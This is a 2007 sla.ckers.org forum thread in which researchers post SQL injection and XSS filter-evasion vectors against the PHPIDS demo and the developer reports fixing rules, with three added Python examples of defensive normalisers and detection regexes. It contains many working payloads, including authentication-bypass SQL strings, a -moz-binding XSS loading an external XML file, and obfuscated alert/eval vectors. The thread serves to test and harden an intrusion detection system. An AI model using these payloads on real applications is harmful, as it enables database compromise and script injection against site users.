Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: October 25, 2007 10:30AM

It's really getting harder ...
these work, although you have to know a column name first
(php-ids) aa'or column*0 like'0 (or rlike, regexp ...)
(php-ids) aa'or column*0='0
this also works with some reserved words the rules might not detect yet
(php-ids) aa'or current_date*0 != '1
but yeah, I don't like those kind of vectors that much ;)

greetings,
Reiners

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: October 28, 2007 10:09AM

Hi Reiners!

I just fixed them issues ;) Thx!

I sent you the Interview questions via PM...

Greetings,
.mario

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: kirke
Date: October 28, 2007 10:12AM

@.mario
from your initial post we see
(\\[\w]{3}) //detects the IE hex entities
checked most comments here and the default_filter.xml too, but it seems that this has not been improved, did you?
I'd use following instead (though not sure if 7 is really a limit):
(\\[a-zA-Z0-9]{1,7})  //  used character class 'cause I'd never use \w in a security context ;-) 

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Date: October 28, 2007 11:01AM

style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);"

trips the -mod-binding sig. but when I do this it does not..

style="-m\oz-bin\ding:url(http://h4k.in/mozxss.xml#xss);"

I thought the above is valid, reason you can bypass filters by say using ba\ckg\round-ima\ge:

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: October 28, 2007 11:35AM

@kirke: Hi!
(\\[\w]{3}) //detects the IE hex entities
That rule doesn't exist anymore. Why wouldn't you use \w in a security context?

@CrYpTiC_MauleR: Hmmm - that one's hard to come by effectively. I'll think about that, thx!

Greetings,
.mario

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: October 28, 2007 12:13PM

Hi .mario!
interesting questions :) I'll answer them within the next couple of days.
until then, some modifications:

http://demo.php-ids.org/?test=aa'*%20current_date%20!=%20'1 aa'* current_date != '1
http://demo.php-ids.org/?test=1'*current_date*-0%20=%20'0 1'*current_date*-0 = '0
http://demo.php-ids.org/?test=1'*current_date%20rlike'0 1'*current_date rlike'0

http://demo.php-ids.org/?test=aa'/current_date%20in%20(0)%20--%20-a aa'/current_date in (0) -- -a
http://demo.php-ids.org/?test=aa'%20/%20current_date%20regexp%20'0 aa' / current_date regexp '0
http://demo.php-ids.org/?test=0'%20/%20current_date%20XOR%20'1 0' / current_date XOR '1
http://demo.php-ids.org/?test=aa'%20/%20current_date%20!=%20'1 aa' / current_date != '1

http://demo.php-ids.org/?test=1'%20or%20current_date*-0%20rlike'1 1' or current_date*-0 rlike'1

greetings,
Reiners

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: kirke
Date: October 28, 2007 01:41PM

Quote: "Why wouldn't you use .."
I was talking about \hhhhh in IE, there the hex value can be anything between \0 and \fffffff, at least in javascript IIRC ...

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: October 29, 2007 03:44AM

@Reiners:
All fixed - current_whatever just happens to be a keyword too often so now the converter transforms current_\w+ for better detection.

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: October 29, 2007 11:22AM

yep. also check for system variables by looking for @@\w+ or something alike.

http://demo.php-ids.org/?test=1'*@@version*-0%20=%20'0 1'*@@version*-0 = '0

user variables or other statics work also:

http://demo.php-ids.org/?test=1'*UTC_TIME%20or%20'1 1'*UTC_TIME or '1

http://demo.php-ids.org/?test=1'*@a%20or%20'1 1'*@a or '1
http://demo.php-ids.org/?test=1'*null%20or%20'1 1'*null or '1
http://demo.php-ids.org/?test=1'*@a%20is%20null%20-%20%27 1'*@a is null - '
http://demo.php-ids.org/?test=1'*null%20is%20null%20-%20%27 1'*null is null - '

@a is an unset user variable, so "1 * @var" returns "null".
the ending - ' just ensures that quotes are closed, because I can't find an undetected comment type atm ;)

greetings,
Reiners

edit:
just noticed that you can use \N as synonym for "null" ... that may trick some rules too. I'll try later ;)



Edited 3 time(s). Last edit at 10/29/2007 11:30AM by Reiners.

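Added example, not PHPIDS code and not posted by anyone in the thread: a normalisation step of the kind .mario describes for current_\w+ ("the converter transforms current_\w+ for better detection"), extended to the other MySQL statics Reiners lists above (@@system variables, @user variables, UTC_*, null and its \N synonym). Everything that evaluates to a value without naming a column is rewritten to one placeholder before the rule runs, so a single rule covers every keyword spelling. The placeholder name, the rule and the two benign inputs are my own constructions; the suspicious inputs are the vectors quoted in the thread.

```python
import re

# Constructed normaliser (not PHPIDS's converter): rewrite MySQL "statics" to one token
# before signature matching, so a rule needs to know one shape instead of every keyword.

TOKEN = "{STATIC}"                  # braces so it cannot collide with a plain word
TOK = re.escape(TOKEN)

STATIC_RE = re.compile(
    r"\\N"                          # MySQL synonym for NULL (literal backslash-N)
    r"|\bnull\b"
    r"|\bcurrent_\w+"               # current_date, current_time, current_user, ...
    r"|\butc_\w+"                   # utc_time, utc_date, utc_timestamp
    r"|@@\w+"                       # system variables such as @@version (before @\w+)
    r"|@\w+",                       # user variables; an unset one evaluates to NULL
    re.IGNORECASE,
)

def normalise(payload: str) -> str:
    """Replace MySQL statics with TOKEN and collapse whitespace runs."""
    return re.sub(r"\s+", " ", STATIC_RE.sub(TOKEN, payload)).strip()

# One rule over the normalised form, covering the three shapes seen in the thread:
#   quote, optional operator or boolean keyword, static      e.g. 1'*{STATIC} ...
#   static, optional arithmetic, comparison or boolean       e.g. {STATIC}*0 != '1
#   IS [NOT] static                                          e.g. 1 is not {STATIC}
RULE_RE = re.compile(
    rf"'\s*[*/^|&+-]?\s*(?:or|and|xor|not)?\s*{TOK}"
    rf"|{TOK}\s*[*/^|]?\s*-?\d*\s*(?:[=!<>]=?|\b(?:is|in|r?like|regexp|xor|or|and)\b)"
    rf"|\bis\s+(?:not\s+)?{TOK}",
    re.IGNORECASE,
)

def is_suspicious(payload: str) -> bool:
    """True when the normalised payload matches the rule above."""
    return RULE_RE.search(normalise(payload)) is not None

if __name__ == "__main__":
    # Vectors quoted from the thread plus two constructed benign inputs.
    for p in ["1'*@@version*-0 = '0", "1'*UTC_TIME or '1", "1'*@a is null - '",
              "aa'or current_date*0 != '1", "1 is not \\N",
              "O'Reilly and friends", "the @alice account"]:
        print(f"{is_suspicious(p)!s:5}  {normalise(p)}")
```

The rule is deliberately small; the point is that once the statics collapse to one token, the vectors in this thread all reduce to a quote or comparison next to that token, which is what the rule looks for. A benign sentence such as "this is null" would still trip the third shape, so a production rule set needs tuning this toy does not attempt.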
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: October 29, 2007 12:14PM

fixed!

Wow - the \N issue is ugly. In what combinations can you use this? IS \N and NOT \N too?

Greetings,
.mario

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: October 29, 2007 02:50PM

"1/0 is \N" and "1 is not \N" both work.

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: tx
Date: October 29, 2007 02:51PM

Hey .mario,

Auth Bypass MATCH...AGAINST Variations http://demo.php-ids.org/?test=%27%20or%20MATCH%20username%20AGAINST%20%28%27%2badmin%20-a%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a :
?test=' or MATCH username AGAINST ('+admin -a' IN BOOLEAN MODE); -- -a
?test=' or MATCH username,password AGAINST ('+admin -a' IN BOOLEAN MODE); -- -a
?test=' or MATCH username AGAINST ('admin' IN BOOLEAN MODE); -- -a
?test=' or MATCH username AGAINST ('admin -)' IN BOOLEAN MODE); -- -a
?test=' or MATCH username AGAINST ('a* -) -+ ' IN BOOLEAN MODE); -- -a
?test=' or MATCH username AGAINST ('+a* -anything can go here %#$&*$%^*#%$^&#$' IN BOOLEAN MODE); -- -a

EDIT:
Negative matching:
 ?test=' or NOT MATCH username AGAINST ('+h -a*' IN BOOLEAN MODE); -- -a
Stopwords:
?test=' or MATCH username AGAINST ('following contains follow inasmuch as admin contains a and then some etc etc etc. thanx' IN BOOLEAN MODE); -- -a

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 10/29/2007 03:50PM by tx.

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: October 29, 2007 03:44PM

I tested a few old ones, I couldn't wait ;) But seems like the rules are very good now, they resisted some very tricky ones.

Again a vector I personally don't like, but as stated it is no problem to find out a column name on MySQL (if error reporting is on).
http://demo.php-ids.org/?test=1'/column%20is%20not%20null%20-%20%27 1'/column is not null - '
http://demo.php-ids.org/?test=1'*column%20is%20not%20%5CN%20-%20%27 1'*column is not \N - '
http://demo.php-ids.org/?test=1'%5ecolumn%20is%20not%20null%20-%20%27 1'^column is not null - '

Then again one I like:
http://demo.php-ids.org/?test='is%5CN%20-%20'1 'is\N - '1
http://demo.php-ids.org/?test=aa'%20is%20%5CN%20or%20'1 aa' is \N or '1
(both return true, although I'm not quite sure why the first one does ;)

greetings,
Reiners

PS: I'm not forgetting about the interview ;)

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: October 30, 2007 11:24AM

@Reiners and tx: fixed!

@CrYpTiC_MauleR: In what browser did you get that one running?

style="-m\oz-bin\ding:url(http://h4k.in/mozxss.xml#xss);"

Greetings,
.mario

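Added example, not PHPIDS code and not posted by anyone in the thread: a decoder for CSS backslash escapes as CSS 2.1 section 4.1.3 defines them (a backslash followed by one to six hex digits and an optional single whitespace character is a code point; a backslash before any other character just yields that character). It bears on .mario's question about the escaped -moz-binding value: \o is a plain escaped "o", but \d is a hex digit, so a conforming parser reads -moz-bin followed by U+000D and "ing", not -moz-binding. The defensive point is to run the style-attribute signature on the decoded value rather than the raw one. The out-of-range handling (U+FFFD) follows CSS Syntax Level 3; the example.invalid URL and the function names are my own constructions.

```python
import re

# Constructed decoder (not PHPIDS's converter) for CSS 2.1 backslash escapes:
#   \ + 1..6 hex digits (+ one optional whitespace char) -> that code point
#   \ + any other char except LF, CR, FF                 -> that char literally
CSS_ESCAPE_RE = re.compile(r"\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|([^\n\r\f]))")

def decode_css_escapes(value: str) -> str:
    """Return the string a CSS parser sees after resolving backslash escapes."""
    def repl(m):
        hexdigits, literal = m.group(1), m.group(2)
        if hexdigits is None:
            return literal
        cp = int(hexdigits, 16)
        # CSS 2.1 forbids zero; CSS Syntax 3 maps zero, surrogates and > U+10FFFF to U+FFFD
        if cp == 0 or 0xD800 <= cp <= 0xDFFF or cp > 0x10FFFF:
            return "\ufffd"
        return chr(cp)
    return CSS_ESCAPE_RE.sub(repl, value)

# The signature is applied to the decoded value, not the raw attribute text.
BINDING_RE = re.compile(r"-moz-binding\s*:", re.IGNORECASE)

def has_moz_binding(style_value: str) -> bool:
    return BINDING_RE.search(decode_css_escapes(style_value)) is not None

if __name__ == "__main__":
    # Constructed inputs: the thread's escaped spelling and a hex-escaped spelling.
    for v in ["-m\\oz-bin\\ding:url(http://example.invalid/x.xml#xss)",
              "-m\\6fz-bin\\64 ing:url(http://example.invalid/x.xml#xss)"]:
        print(has_moz_binding(v), repr(decode_css_escapes(v)))
```

Note the asymmetry: the thread's spelling decodes to a value containing a carriage return and therefore matches neither the raw signature nor the decoded one, while a hex-escaped spelling only matches after decoding. A signature that never decodes sees neither.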
Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: October 30, 2007 01:14PM

http://demo.php-ids.org/?test=aa'%20is%20%5CN%20or%201%20--%20-a aa' is \N or 1 -- -a

greetings,
Reiners

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Gareth Heyes
Date: October 30, 2007 09:31PM

Muwhahahahahaha

Hackvertor makes my life easier ;)

foo = { get test() { return alert(1) } },
foo.test

gets through :D

http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Gareth Heyes
Date: November 03, 2007 05:16PM

a&#8205lert(1)


Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Gareth Heyes
Date: November 03, 2007 05:18PM

a‌lert(1)


Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Gareth Heyes
Date: November 03, 2007 06:00PM

I found those 2 after about 8 pints of beer too :P

hehe beer + hacking == fun


Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: November 07, 2007 10:33AM

http://demo.php-ids.org/?test=aa%27is%5CN%7c!%27 aa'is\N|!'
http://demo.php-ids.org/?test=%27is%5CN-!%27 'is\N-!' (makes no sense to me, but works ;)

unaesthetic:
http://demo.php-ids.org/?test=asd%27%7ccolumn%26%26%271 asd'|column&&'1
http://demo.php-ids.org/?test=asd%27%7ccolumn!=%27 asd'|column!='

greetings,
Reiners

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: November 07, 2007 11:41AM

Hi!

Wow - those are indeed a lil' bit esoteric. Nice ones - thx!

Greetings,
.mario

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: November 07, 2007 03:13PM

this guy brought up a new vector I didn't know of:
select ... from data where not ...
works also with "or" and "and", but not with "is", as far as I've tested.

http://demo.php-ids.org/?test=%27or%20not%27 'or not'
http://demo.php-ids.org/?test='or%20not%20false%20%23aa 'or not false #aa
sweet :)



Edited 1 time(s). Last edit at 11/07/2007 03:20PM by Reiners.

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: November 07, 2007 04:04PM

Nice - SQL really seems to be as flexible as JS. Anyway any vector slipping through via new keywords is easy to fix, thanks!

Greetings,
.mario

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Gareth Heyes
Date: November 09, 2007 10:20AM

ha ya!

http://www.thespanner.co.uk/2007/11/09/webfu-using-the-hackvertor-hanzo-sword/


Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Reiners
Date: November 19, 2007 11:10AM

Hi, no new vectors, but an old one passes by adding spaces:
http://demo.php-ids.org/?test=%27%20is%20%5CN%20-%20!%20%27 ' is \N - ! '
http://demo.php-ids.org/?test=%27%20is%20%5CN%20=%20%27 ' is \N = '

Today I was also checking how an SQLi attacker can fly below the PHP-IDS radar. I think that most users will only log high impacts; however, if you know that PHP-IDS is running, you can almost always modify your injection to get an impact of 5 or 6. Well, a user could modify the impact for every SQLi rule himself, but I think most of them will leave it at the default.
I guess it's beyond the scope of PHP-IDS and I couldn't think of a good solution for this either, since I don't think raising the default impact does the job. Just some thoughts.

greetings,
Reiners

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: November 19, 2007 04:27PM

Ew - gotta fix them tomorrow fixed :)

Hmmm - normally the impact should be incremented via session - so repeated attacks will result in very high impact.

But I guess not everybody implemented that functionality.

Thanks and Greetings,
.mario



Edited 1 time(s). Last edit at 11/20/2007 03:12AM by .mario.

Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Gareth Heyes
Date: November 20, 2007 10:11AM

&#x65val("aler&quot + "t(1)")


Re: PHPIDS (0.4.2 eating vectors for breakfast)
Posted by: Anonymous User
Date: November 20, 2007 10:53AM

Fixed in PHPIDS 0.4.3 - very nice find - damn unclosed named entities!

btw - it's a kind of a quickfix - so there might be more with this way. For now :)

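Added example, not PHPIDS code and not posted by anyone in the thread: the normalisation that Gareth's three vectors (a&#8205lert(1), the same with a literal zero-width joiner, and &#x65val("aler&quot + "t(1)")) and .mario's "damn unclosed named entities" fix call for. An HTML5 parser decodes numeric character references, and the legacy named references such as &quot, even without a trailing semicolon, and a zero-width joiner inside an identifier is invisible to the eye but not to a signature. Python's html.unescape follows the HTML5 rules, so the example decodes with it and then strips zero-width characters before a signature runs. The sink regex, function names and the benign input are my own constructions.

```python
import html
import re

# Constructed normaliser (not PHPIDS's converter): decode character references the way
# an HTML5 parser does, then drop zero-width characters, before signature matching.
ZERO_WIDTH_RE = re.compile("[\u200b\u200c\u200d\u2060\ufeff]")

def normalise_html(payload: str) -> str:
    """html.unescape handles &#8205lert, &#x65val and &quot without a semicolon."""
    decoded = html.unescape(payload)
    return ZERO_WIDTH_RE.sub("", decoded)

# A deliberately small signature for two JavaScript sinks named in the thread.
JS_SINK_RE = re.compile(r"\b(?:alert|eval)\s*\(", re.IGNORECASE)

def flags_js_sink(payload: str) -> bool:
    """True when the normalised payload contains alert( or eval(."""
    return JS_SINK_RE.search(normalise_html(payload)) is not None

if __name__ == "__main__":
    # The thread's three vectors plus one constructed benign input.
    for p in ["a&#8205lert(1)", "a\u200dlert(1)",
              '&#x65val("aler&quot + "t(1)")', "Tom &amp; Jerry"]:
        print(f"{flags_js_sink(p)!s:5} raw={p!r:40} normalised={normalise_html(p)!r}")
```

The quick fix .mario mentions is the semicolon-less case; the example shows why decoding has to follow the parser's rules rather than the grammar a tidy author would write, since the browser will accept the untidy form either way.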
Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Reiners
Date: November 20, 2007 02:12PM

http://demo.php-ids.org/?test='%20is%20%5CN=%27 :)

right, I totally forgot about the session which is a good solution I think.

greetings,
Reiners

Re: PHPIDS (0.4.3 - your mom already uses it!)
Posted by: Anonymous User
Date: November 21, 2007 04:25AM

Ah - little bug in one of the SQLI rules - a + where a * should have been used. Thanks for pointing out!
